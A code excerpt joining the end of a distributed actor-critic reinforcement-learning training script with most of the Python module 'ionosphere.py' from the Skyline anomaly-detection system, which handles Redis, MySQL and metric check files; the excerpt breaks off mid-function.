a = local_net.choose_action(s)
s_, r, done, info = env.step(a)
if done: r = -5.
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = sess.run(local_net.v, {local_net.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(
buffer_v_target)
feed_dict = {
local_net.s: buffer_s,
local_net.a_his: buffer_a,
local_net.v_target: buffer_v_target,
}
local_net.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
local_net.pull_global()
s = s_
total_step += 1
if done:
if r_queue.empty(): # record running episode reward
global_running_r.value = ep_r
else:
global_running_r.value = .99 * global_running_r.value + 0.01 * ep_r
r_queue.put(global_running_r.value)
print(
"Task: %i" % task_index,
"| Ep: %i" % global_ep.value,
"| Ep_r: %i" % global_running_r.value,
"| Global_step: %i" % sess.run(local_net.global_step),
)
with lock:
global_ep.value += 1
break
print('Worker Done: ', task_index, time.time()-t1)
if __name__ == "__main__":
# use multiprocessing to create a local cluster with 2 parameter servers and 2 workers
global_ep = mp.Value('i', 0)
lock = mp.Lock()
r_queue = mp.Queue()
global_running_r = mp.Value('d', 0)
jobs = [
('ps', 0), ('ps', 1),
('worker', 0), ('worker', 1), ('worker', 2), ('worker', 3)
]
ps = [mp.Process(target=work, args=(j, i, global_ep, lock, r_queue, global_running_r), ) for j, i in jobs]
[p.start() for p in ps]
[p.join() for p in ps[2:]]
ep_r = []
while not r_queue.empty():
ep_r.append(r_queue.get())
plt.plot(np.arange(len(ep_r)), ep_r)
plt.title('Distributed training')
plt.xlabel('Step')
plt.ylabel('Total moving reward')
plt.show()
|
ionosphere.py
|
from __future__ import division
import logging
import os
from os import kill, getpid, listdir
from os.path import join, isfile
from sys import version_info
try:
from Queue import Empty
except:
from queue import Empty
from time import time, sleep
from threading import Thread
from multiprocessing import Process, Manager
import re
from shutil import rmtree
import csv
from ast import literal_eval
from datetime import datetime
from redis import StrictRedis
import traceback
import mysql.connector
# from mysql.connector import errorcode
from sqlalchemy.sql import select
# @added 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
from sqlalchemy.sql import desc
# @added 20161213 - Branch #1790: test_tsfresh
# To match the new order introduced via the test_tsfresh method
import numpy as np
# import pandas as pd
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
from tsfresh import __version__ as tsfresh_version
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
from pymemcache.client.base import Client as pymemcache_Client
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
import pandas as pd
from tsfresh.feature_extraction import (
extract_features, ReasonableFeatureExtractionSettings)
import settings
from skyline_functions import (
fail_check, mysql_select, write_data_to_file, send_graphite_metric, mkdir_p,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
get_memcache_metric_object)
# @added 20161221 - calculate features for every anomaly, instead of making the
# user do it in the frontend or calling the webapp constantly in a cron like
# manner. Decouple Ionosphere from the webapp.
from features_profile import calculate_features_profile
# @modified 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched_meta
from database import (
get_engine, ionosphere_table_meta, metrics_table_meta,
ionosphere_matched_table_meta)
from tsfresh_feature_names import TSFRESH_FEATURES
# @added 20170114 - Feature #1854: Ionosphere learn
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# from learn import learn
from learn import ionosphere_learn
# @added 20170306 - Feature #1960: ionosphere_layers
from layers import run_layer_algorithms
skyline_app = 'ionosphere'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_IONOSPHERE_DEBUG = settings.ENABLE_IONOSPHERE_DEBUG
except:
logger.error('error :: cannot determine ENABLE_IONOSPHERE_DEBUG from settings')
ENABLE_IONOSPHERE_DEBUG = False
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# Number of processes to assign to Ionosphere, however Ionosphere should never
# need more than 1 and is effectively hard coded as such currently. This
# variable is only declared for the purpose of maintaining a standard set up in
# each module and to possibly enable more than one processor on Ionosphere in
# the future, should there be a requirement for Ionosphere to analyse the
# metrics quicker. Running Ionosphere with more than one process is untested
# and currently it is hard coded to be 1
# (https://github.com/earthgecko/skyline/issues/69)
try:
ionosphere_processes = settings.IONOSPHERE_PROCESSES
if ionosphere_processes != 1:
ionosphere_processes = 1
except:
ionosphere_processes = 1
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
max_age_seconds = settings.IONOSPHERE_CHECK_MAX_AGE
# Database configuration
config = {'user': settings.PANORAMA_DBUSER,
'password': settings.PANORAMA_DBUSERPASS,
'host': settings.PANORAMA_DBHOST,
'port': settings.PANORAMA_DBPORT,
'database': settings.PANORAMA_DATABASE,
'raise_on_warnings': True}
failed_checks_dir = '%s_failed' % settings.IONOSPHERE_CHECK_PATH
last_purge_key = '%s.last_purge_ts' % skyline_app
LOCAL_DEBUG = False
class Ionosphere(Thread):
"""
The Ionosphere class which controls the ionosphere thread and spawned
processes.
"""
def __init__(self, parent_pid):
"""
Initialize Ionosphere
Create the :obj:`self.anomalous_metrics` list
"""
super(Ionosphere, self).__init__()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.mysql_conn = mysql.connector.connect(**config)
self.anomalous_metrics = Manager().list()
self.not_anomalous = Manager().list()
self.features_profiles_checked = Manager().list()
self.training_metrics = Manager().list()
self.sent_to_panorama = Manager().list()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
self.ionosphere_smtp_alerter_metrics = Manager().list()
self.ionosphere_non_smtp_alerter_metrics = Manager().list()
# @added 20170306 - Feature #1960: ionosphere_layers
self.layers_checked = Manager().list()
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
self.memcache_client = pymemcache_Client((settings.MEMCACHED_SERVER_IP, settings.MEMCACHED_SERVER_PORT), connect_timeout=0.1, timeout=0.2)
else:
self.memcache_client = None
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
"""
These are the ionosphere mysql functions used to surface and input
ionosphere data for timeseries.
"""
def mysql_insert(self, insert):
"""
Insert data into mysql table
:param insert: the insert string
:type insert: str
:return: int
:rtype: int or boolean
- **Example usage**::
query = 'insert into host (host) VALUES (\'this_host\')'
result = self.mysql_insert(query)
.. note::
- If the MySQL query fails a boolean will be returned not a tuple
* ``False``
* ``None``
"""
try:
cnx = mysql.connector.connect(**config)
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to mysql')
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('error :: failed to connect to mysql')
raise
if cnx:
try:
cursor = cnx.cursor()
cursor.execute(insert)
inserted_id = cursor.lastrowid
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
return inserted_id
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('Failed to insert record')
cnx.close()
raise
else:
cnx.close()
return False
return False
def purge_old_data_dirs(self, dir_path, older_than):
time_now = time()
logger.info(
'Cleaning old training data from %s older than %s seconds' %
(dir_path, str(older_than)))
try:
for path, folders, files in os.walk(dir_path):
for folder in folders[:]:
folder_path = os.path.join(path, folder)
# Only timestamped directories are removed
if re.match('\d{10}', folder):
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: matched - %s' % folder_path)
if (time_now - os.path.getmtime(folder_path)) > older_than:
try:
rmtree(folder_path)
logger.info('removed - %s' % folder_path)
except:
logger.error('error :: failed to rmtree %s' % folder_path)
except:
logger.info(traceback.format_exc())
logger.error('error :: purge_old_data_dirs - os.walk')
last_purge_ts = int(time())
try:
self.redis_conn.setex(last_purge_key, 1800, last_purge_ts)
logger.info('updated Redis key for %s' % last_purge_key)
except:
logger.error('error :: failed to update Redis key for %s' % last_purge_key)
backup_purge_ts_file = '%s/last_purge_ts.txt' % (settings.IONOSPHERE_DATA_FOLDER)
try:
write_data_to_file(skyline_app, backup_purge_ts_file, 'w', last_purge_ts)
logger.info('updated the backup_purge_ts_file with %s' % str(last_purge_ts))
except:
logger.error('error :: failed to update the backup_purge_ts_file - %s' % backup_purge_ts_file)
return
def remove_metric_check_file(self, metric_check_file):
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
def manage_ionosphere_unique_metrics(self):
"""
Create a Redis set of all Ionosphere enabled metrics.
:param i: python process id
:return: returns True
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error('%s' % trace)
log_msg = 'error :: failed to get MySQL engine for manage_ionosphere_unique_metrics'
logger.error('%s' % log_msg)
return None, log_msg, trace
ionosphere_unique_metrics_count = 0
redis_ionosphere_unique_metrics = None
ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
manage_ionosphere_unique_metrics = True
manage_ionosphere_unique_metrics_key = []
try:
manage_ionosphere_unique_metrics_key = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
if LOCAL_DEBUG:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics key: %s' % str(e))
if manage_ionosphere_unique_metrics_key is not None:
manage_ionosphere_unique_metrics = False
logger.info('getting MySQL engine for ionosphere_enabled_metrics')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for ionosphere_enabled_metrics')
return False
if not engine:
logger.error('error :: MySQL engine not obtained for ionosphere_enabled_metrics')
return False
# Determine the metrics that have ionosphere_enabled
# @added 20170103 - Task #1658: Patterning Skyline Ionosphere
# TODO: We need 2 sets not just ionosphere.unique_metrics otherwise
# if a metric is switch from Analyzer to Mirage will send all
# matched anomalies to Ionosphere even if there is no features
# profile at the specified duration.
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
# @modified 20170108 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Yes those ^^ are needed, MySQL join?
ionosphere_enabled_metrics = []
ionosphere_metrics_count = 0
query_ok = False
try:
stmt = 'select metric from metrics where ionosphere_enabled=1'
connection = engine.connect()
for row in engine.execute(stmt):
metric_basename = row['metric']
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric_basename))
ionosphere_enabled_metrics.append(metric_name)
connection.close()
query_ok = True
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled metrics from the DB to manage ionosphere.unique_metrics Redis set')
ionosphere_metrics_count = len(ionosphere_enabled_metrics)
logger.info('db has %s ionosphere_enabled metrics' % (str(ionosphere_metrics_count)))
if manage_ionosphere_unique_metrics:
# Testing the query was fine and Ionosphere metrics can go to 0 if
# all were disabled
if query_ok:
manage_ionosphere_unique_metrics = True
else:
manage_ionosphere_unique_metrics = False
if manage_ionosphere_unique_metrics:
for metric_name in ionosphere_enabled_metrics:
try:
self.redis_conn.sadd('ionosphere.new_unique_metrics', metric_name)
# logger.info('added %s to ionosphere.new_unique_metrics Redis set' % metric_name)
except:
logger.error(traceback.format_exc())
logger.info('error :: failed to add %s to ionosphere.new_unique_metrics Redis set' % metric_name)
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
try:
logger.info('replacing Redis ionosphere.unique_metrics via rename of ionosphere.new_unique_metrics')
self.redis_conn.rename('ionosphere.new_unique_metrics', 'ionosphere.unique_metrics')
manage_ionosphere_unique_metrics = False
ionosphere_unique_metrics = []
except Exception as e:
logger.error('error :: could not delete Redis set ionosphere.unique_metrics: %s' % str(e))
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
redis_ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('the new Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return True
# @added 20161230 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def new_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source']
float_keys = ['value']
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
int_keys = [
'from_timestamp', 'metric_timestamp', 'added_at', 'full_duration',
'ionosphere_parent_id']
array_keys = ['algorithms', 'triggered_algorithms']
boolean_keys = ['graphite_metric', 'run_crucible_tests']
metric_vars_array = []
for var_array in metric_vars:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = int(value_str)
if var_array[0] in array_keys:
key = var_array[0]
value = literal_eval(str(var_array[1]))
if var_array[0] in boolean_keys:
key = var_array[0]
if str(var_array[1]) == 'True':
value = True
else:
value = False
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
'error :: loading metric variables - none found' % (
str(metric_vars_file)))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the spawn_learn_process after determining to is not fit to bolt learn
# inside of ionosphere.py in its entirety, no point in more conditional nesting
# and bulking up ionosphere.py with more learn parameter to spin_process etc
# ionosphere.py works, as good as it gets, so extended with learn.py. This uses
# the same no memory leak pattern that was adopted for smtp_alerts.
def spawn_learn_process(self, i, timestamp):
"""
Spawn a process to learn.
This is used for Ionosphere to learn if anomalous metrics remain
anomalous over time, as the resolution decreases. It follows the
multiprocessing methodology the was introduced in Analyzer and Mirage
in the context of the process objects being cleared down and the learn
processes cannot create memory leaks as the process always terminates or
is terminated this prevents any memory leaks in the parent.
"""
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# learn(timestamp)
ionosphere_learn(timestamp)
def spin_process(self, i, metric_check_file):
"""
Assign an anomalous metric to check against features profiles.
:param i: python process id
:param metric_check_file: full path to the metric check file
:type i: object
:type metric_check_file: str
:return: int
:rtype: int or boolean
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
logger.error(traceback.format_exc())
log_msg = 'error :: failed to get MySQL engine in spin_process'
logger.error('error :: failed to get MySQL engine in spin_process')
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return
child_process_pid = os.getpid()
logger.info('child_process_pid - %s' % str(child_process_pid))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name)
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: failed_check_file - %s' % failed_check_file)
# @added 20170307 - Feature #1960: ionosphere_layers - ionosphere_check_cache_key
# This Redis cache key check was added to prevent Ionosphere from
# running riot on checks if for some reason the check_file is not
# removed which happens if some exception is not handled as found out
# again during yesterday's development of run_layer_algorithms. It was
# a good reminder of how fast Skyline can iterate.
ionosphere_check_cache_key = 'ionosphere.check.%s' % check_file_name
check_done = False
try:
check_done = self.redis_conn.get(ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('check done check - no check cache key - %s' % ionosphere_check_cache_key)
else:
# @modified 20181113 - Task #2680: Remove Ionosphere check files is key exists
# This was here for initially debugging, no longer needed
# logger.error('error :: a check cache key exists - %s' % ionosphere_check_cache_key)
# logger.error('error :: failing check to prevent multiple iterations over this check')
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
logger.info('a check cache key exists - %s' % (ionosphere_check_cache_key))
logger.info('to prevent multiple iterations over this check removing %s' % (
str(metric_check_file)))
self.remove_metric_check_file(str(metric_check_file))
return
try:
check_process_start = int(time())
self.redis_conn.setex(
ionosphere_check_cache_key, 300, [check_process_start])
logger.info(
'added Redis check key - %s' % (ionosphere_check_cache_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis check key - %s' % (ionosphere_check_cache_key))
logger.error('error :: failing check to prevent multiple iterations over this check')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# Load and validate metric variables
# @modified 20161231 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# Use def new_load_metric_vars(self, metric_vars_file):
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
# We use a pythonic methodology to test if the variables are defined,
# this ensures that if any of the variables are not set for some reason
# we can handle unexpected data or situations gracefully and try and
# ensure that the process does not hang.
metric = None
try:
# metric_vars.metric
# metric = str(metric_vars.metric)
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
base_name = metric
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
value = None
try:
# metric_vars.value
# value = str(metric_vars.value)
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
anomalous_value = value
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - value - %s' % str(value))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
value = None
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
from_timestamp = None
try:
# metric_vars.from_timestamp
# from_timestamp = str(metric_vars.from_timestamp)
key = 'from_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
from_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - from_timestamp - %s' % str(from_timestamp))
except:
# @added 20160822 - Bug #1460: panorama check file fails
# Added exception handling here
logger.info(traceback.format_exc())
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
if not from_timestamp:
logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
metric_timestamp = None
try:
# metric_vars.metric_timestamp
# metric_timestamp = str(metric_vars.metric_timestamp)
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric_timestamp - %s' % str(metric_timestamp))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
metric_timestamp = None
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# metric_vars.algorithms
# algorithms = metric_vars.algorithms
key = 'algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms - %s' % str(algorithms))
except:
logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file))
algorithms = 'all'
try:
# metric_vars.triggered_algorithms
# triggered_algorithms = metric_vars.triggered_algorithms
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms))
except:
logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file))
triggered_algorithms = 'all'
added_by = None
try:
# metric_vars.added_by
# added_by = str(metric_vars.added_by)
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170117 - Feature #1854: Ionosphere learn - generations
if str(added_by) == 'ionosphere_learn':
logger.info('debug :: metric variable - added_by - %s' % added_by)
try:
# metric_vars.added_at
# added_at = str(metric_vars.added_at)
key = 'added_at'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_at = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_at - %s' % str(added_at))
except:
logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file))
added_at = metric_timestamp
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
full_duration = None
try:
# metric_vars.full_duration
# full_duration = str(metric_vars.full_duration)
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = None
ionosphere_parent_id_determined = False
try:
key = 'ionosphere_parent_id'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
ionosphere_parent_id = int(value_list[0])
ionosphere_parent_id_determined = True
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - ionosphere_parent_id - %s' % str(ionosphere_parent_id))
except:
logger.error('error :: failed to read ionosphere_parent_id variable from check file - %s' % (metric_check_file))
ionosphere_parent_id = None
if not ionosphere_parent_id_determined:
logger.error('error :: failed to determine ionosphere_parent_id variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @modified 20170116 - Feature #1854: Ionosphere learn
# Do not check the cache key or anomaly age if added by ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20170101 - Feature #1830: Ionosphere alerts
# Remove check file is an alert key exists
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
logger.info('debug :: no alert cache key - %s' % cache_key)
else:
logger.info('debug :: removing check - alert cache key exists - %s' % cache_key)
self.remove_metric_check_file(str(metric_check_file))
return
now = time()
anomaly_age = int(now) - int(metric_timestamp)
if anomaly_age > max_age_seconds:
logger.info(
'Ionosphere check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % (
metric, str(anomaly_age), str(max_age_seconds)))
with open(metric_check_file, 'rt') as fr:
metric_check_file_contents = fr.readlines()
logger.info(
'debug :: metric check file contents\n%s' % (str(metric_check_file_contents)))
self.remove_metric_check_file(str(metric_check_file))
return
else:
logger.info('processing check_file for ionosphere_learn - %s' % str(metric_check_file))
# @added 20161222 - ionosphere should extract features for every anomaly
# check that is sent through and calculate a feature_profile ready for
# submission by the user if they so choose. Further ionosphere could
# make itself more useful by comparing any training data profiles to
# further anomalies, however the feature profiles for subsequent
# anomalies may be similar enough to match a few times and each a closer
# match to the next.
training_metric = False
metrics_id = None
metric_ionosphere_enabled = None
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values avaialble in it. Here we go! Learn!
metrics_db_object = None
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Try memcache first
try:
engine
except:
engine = None
memcache_metrics_db_object = None
metrics_db_object_key = 'metrics_db_object.%s' % str(base_name)
memcache_metric_dict = None
if settings.MEMCACHE_ENABLED:
memcache_metric_dict = get_memcache_metric_object(skyline_app, base_name)
query_metric_table = True
if memcache_metric_dict:
